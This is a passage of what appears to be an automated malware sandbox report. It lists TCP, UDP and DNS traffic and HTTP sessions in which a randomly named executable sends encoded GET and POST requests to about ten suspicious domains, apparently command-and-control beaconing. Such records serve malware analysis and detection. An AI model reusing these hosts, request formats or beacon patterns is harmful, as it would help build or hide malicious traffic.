                                                                Jan 11, 2025 05:11:31.239691019 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784411907 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784923077 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784935951 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784976006 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784986019 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784996986 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785003901 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785022974 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785034895 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785036087 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.785044909 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785125971 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.785126925 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.796931982 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.796952009 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.797126055 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.799858093 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.804687023 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:36.829547882 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:36.834383965 CET804999746.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:36.834465981 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:36.849097967 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:36.853981018 CET804999746.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:37.668147087 CET804999746.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:37.668230057 CET804999746.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:37.668380976 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:38.357567072 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:39.376761913 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:39.381792068 CET804999846.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:39.381953001 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:39.396920919 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:39.402056932 CET804999846.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:40.201736927 CET804999846.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:40.201767921 CET804999846.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:40.201873064 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:40.904532909 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:41.922923088 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:41.928029060 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:41.928193092 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:41.940936089 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:41.945815086 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:41.945949078 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:42.759365082 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:42.759429932 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:42.759532928 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:43.455172062 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:44.470546007 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:44.476819992 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:44.476936102 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:44.484338999 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:44.489100933 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:45.286318064 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:45.286385059 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:45.286570072 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:45.289122105 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:45.293971062 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:50.998991966 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:51.003948927 CET8050001107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:51.004112959 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:51.019176006 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:51.024117947 CET8050001107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:51.567260981 CET8050001107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:51.567341089 CET8050001107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:51.567565918 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:52.529455900 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:53.548408985 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:53.553426027 CET8050002107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:53.553613901 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:53.568902969 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:53.574361086 CET8050002107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:54.116445065 CET8050002107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:54.116544008 CET8050002107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:54.116611958 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:55.076227903 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:56.095556021 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:56.100394011 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.100501060 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:56.114789963 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:56.119666100 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.119683027 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.683727026 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.683903933 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.683958054 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:57.623334885 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:58.641830921 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:58.646753073 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:58.646965981 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:58.656742096 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:58.661659002 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:59.209815025 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:59.209968090 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:59.210138083 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:59.212894917 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:59.217710018 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:12:04.240389109 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:04.245232105 CET8050005209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:04.245323896 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:04.260195971 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:04.265155077 CET8050005209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:04.843435049 CET8050005209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:04.843528986 CET8050005209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:04.843632936 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:05.763854980 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:06.782243013 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:06.787116051 CET8050006209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:06.787241936 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:06.801193953 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:06.806054115 CET8050006209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:07.376384974 CET8050006209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:07.376538992 CET8050006209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:07.376635075 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:08.310883045 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:09.329188108 CET5000780192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:09.524897099 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:09.524974108 CET5000780192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:09.540302038 CET5000780192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:09.545125008 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:09.545272112 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:10.244792938 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:10.244803905 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:10.244812012 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:10.245023012 CET5000780192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:11.045030117 CET5000780192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.063658953 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.068573952 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:12.068679094 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.077794075 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.082740068 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:12.676372051 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:12.676511049 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:12.676593065 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.679514885 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.684340954 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:17.762537003 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:17.767329931 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:17.767448902 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:17.783098936 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:17.787944078 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:18.242116928 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:18.242187023 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:18.242239952 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:18.242280960 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:18.242309093 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:19.295941114 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.313605070 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.318496943 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.318613052 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.332845926 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.337753057 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.814001083 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.814074039 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.814126015 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.814141035 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.814198971 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.815969944 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.816024065 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:21.841969013 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:22.875993967 CET5001180192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:22.881777048 CET8050011199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:22.881859064 CET5001180192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:22.927083969 CET5001180192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:22.931997061 CET8050011199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:22.932081938 CET8050011199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:23.362076998 CET8050011199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:23.362152100 CET8050011199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:23.362206936 CET8050011199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:23.362257004 CET5001180192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:23.365869999 CET5001180192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:24.461844921 CET5001180192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:26.282531023 CET5001380192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:26.463150978 CET8050013199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:26.463227987 CET5001380192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:26.472980976 CET5001380192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:26.477726936 CET8050013199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:26.927902937 CET8050013199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:26.927956104 CET8050013199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:26.927966118 CET8050013199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:26.928061008 CET5001380192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:26.930948019 CET5001380192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:26.935679913 CET8050013199.59.243.228192.168.2.7

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 11, 2025 05:10:12.977731943 CET6064553192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:10:13.448195934 CET53606451.1.1.1192.168.2.7
                                                                Jan 11, 2025 05:10:29.112189054 CET5422453192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:10:29.348176003 CET53542241.1.1.1192.168.2.7
                                                                Jan 11, 2025 05:10:42.548074007 CET5194853192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:10:42.807002068 CET53519481.1.1.1192.168.2.7
                                                                Jan 11, 2025 05:10:56.392246008 CET6299653192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:10:56.538146019 CET53629961.1.1.1192.168.2.7
                                                                Jan 11, 2025 05:11:10.095010996 CET5778253192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:11:10.146513939 CET53577821.1.1.1192.168.2.7
                                                                Jan 11, 2025 05:11:23.548346996 CET5707653192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:11:23.561949015 CET53570761.1.1.1192.168.2.7
                                                                Jan 11, 2025 05:11:36.814445972 CET6417353192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:11:36.827228069 CET53641731.1.1.1192.168.2.7
                                                                Jan 11, 2025 05:11:50.299015999 CET6015953192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:11:50.996249914 CET53601591.1.1.1192.168.2.7
                                                                Jan 11, 2025 05:12:04.220552921 CET5736053192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:12:04.237979889 CET53573601.1.1.1192.168.2.7
                                                                Jan 11, 2025 05:12:17.690448999 CET6268753192.168.2.71.1.1.1
                                                                Jan 11, 2025 05:12:17.760059118 CET53626871.1.1.1192.168.2.7

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 11, 2025 05:10:12.977731943 CET192.168.2.71.1.1.10x28bfStandard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:10:29.112189054 CET192.168.2.71.1.1.10x3c6bStandard query (0)www.bookingservice.centerA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:10:42.548074007 CET192.168.2.71.1.1.10xb685Standard query (0)www.tempatmudisini06.clickA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:10:56.392246008 CET192.168.2.71.1.1.10x5ef6Standard query (0)www.hm35s.topA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:11:10.095010996 CET192.168.2.71.1.1.10x667Standard query (0)www.snehasfashion.shopA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:11:23.548346996 CET192.168.2.71.1.1.10x4f05Standard query (0)www.sitioseguro.blogA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:11:36.814445972 CET192.168.2.71.1.1.10x6fa1Standard query (0)www.windsky.clickA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:11:50.299015999 CET192.168.2.71.1.1.10xeddStandard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:12:04.220552921 CET192.168.2.71.1.1.10xbdc5Standard query (0)www.moviebuff.infoA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:12:17.690448999 CET192.168.2.71.1.1.10x6bdaStandard query (0)www.whisperart.netA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 11, 2025 05:10:13.448195934 CET1.1.1.1192.168.2.70x28bfNo error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 05:10:13.448195934 CET1.1.1.1192.168.2.70x28bfNo error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:10:29.348176003 CET1.1.1.1192.168.2.70x3c6bNo error (0)www.bookingservice.center98.124.224.17A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:10:42.807002068 CET1.1.1.1192.168.2.70xb685No error (0)www.tempatmudisini06.clicktempatmudisini06.clickCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 05:10:42.807002068 CET1.1.1.1192.168.2.70xb685No error (0)tempatmudisini06.click103.21.221.4A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:10:56.538146019 CET1.1.1.1192.168.2.70x5ef6No error (0)www.hm35s.tophm35s.topCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 05:10:56.538146019 CET1.1.1.1192.168.2.70x5ef6No error (0)hm35s.top154.23.184.95A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:11:10.146513939 CET1.1.1.1192.168.2.70x667No error (0)www.snehasfashion.shopsnehasfashion.shopCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 05:11:10.146513939 CET1.1.1.1192.168.2.70x667No error (0)snehasfashion.shop88.198.8.150A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:11:23.561949015 CET1.1.1.1192.168.2.70x4f05No error (0)www.sitioseguro.blog104.21.15.100A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:11:23.561949015 CET1.1.1.1192.168.2.70x4f05No error (0)www.sitioseguro.blog172.67.162.39A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:11:36.827228069 CET1.1.1.1192.168.2.70x6fa1No error (0)www.windsky.click46.253.5.221A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:11:50.996249914 CET1.1.1.1192.168.2.70xeddNo error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 05:11:50.996249914 CET1.1.1.1192.168.2.70xeddNo error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:12:04.237979889 CET1.1.1.1192.168.2.70xbdc5No error (0)www.moviebuff.info209.74.77.109A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 05:12:17.760059118 CET1.1.1.1192.168.2.70x6bdaNo error (0)www.whisperart.net199.59.243.228A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • www.bpgroup.site
                                                                • www.bookingservice.center
                                                                • www.tempatmudisini06.click
                                                                • www.hm35s.top
                                                                • www.snehasfashion.shop
                                                                • www.sitioseguro.blog
                                                                • www.windsky.click
                                                                • www.cssa.auction
                                                                • www.moviebuff.info
                                                                • www.whisperart.net

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.74997474.48.143.8280360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:13.472395897 CET449OUTGET /p8wp/?SVjx=u6ApldVh4TiTWl&-Jkp4f=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrgjhE6i9RZbIooo4nNVZMxCeQfnPSfF8xtI64tEPJw4kQE2O0gU/hSVG6 HTTP/1.1
                                                                Host: www.bpgroup.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:14.069103956 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1251
                                                                date: Sat, 11 Jan 2025 04:10:14 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                Jan 11, 2025 05:10:14.069128036 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.74997698.124.224.1780360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:29.378839970 CET732OUTPOST /47f1/ HTTP/1.1
                                                                Host: www.bookingservice.center
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.bookingservice.center
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.bookingservice.center/47f1/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 69 58 54 53 6b 47 53 56 33 75 67 4f 72 2f 70 6f 47 4c 43 6f 79 76 75 56 53 71 48 55 48 35 4b 6e 52 59 34 4a 39 76 63 35 43 30 67 67 6f 34 50 77 58 58 78 2f 51 2f 2f 41 37 36 48 42 4d 66 56 68 47 70 45 30 44 43 74 31 35 56 49 49 73 48 59 38 2f 51 53 77 2b 4a 4d 52 5a 30 78 63 4f 43 56 63 6d 70 63 72 39 6b 39 43 44 55 45 66 63 6f 61 39 6c 59 57 50 78 58 6a 51 7a 36 31 64 54 69 57 73 69 57 2f 31 4a 74 48 73 72 64 73 44 71 56 42 64 77 4b 6d 44 58 5a 49 74 44 71 59 43 7a 77 64 52 76 41 55 51 6b 63 54 35 42 30 36 6a 66 59 67 45 52 45 59 42 44 6f 79 32 31 63 4b 53 37 6f 48 72 6e 2f 2b 58 34 67 3d 3d
                                                                Data Ascii: -Jkp4f=MMfsStaAwy1DiXTSkGSV3ugOr/poGLCoyvuVSqHUH5KnRY4J9vc5C0ggo4PwXXx/Q//A76HBMfVhGpE0DCt15VIIsHY8/QSw+JMRZ0xcOCVcmpcr9k9CDUEfcoa9lYWPxXjQz61dTiWsiW/1JtHsrdsDqVBdwKmDXZItDqYCzwdRvAUQkcT5B06jfYgEREYBDoy21cKS7oHrn/+X4g==
                                                                Jan 11, 2025 05:10:29.897224903 CET1236INHTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                X-Powered-By: ASP.NET
                                                                X-Frame-Options: SAMEORIGIN
                                                                Date: Sat, 11 Jan 2025 04:10:29 GMT
                                                                Connection: close
                                                                Content-Length: 1245
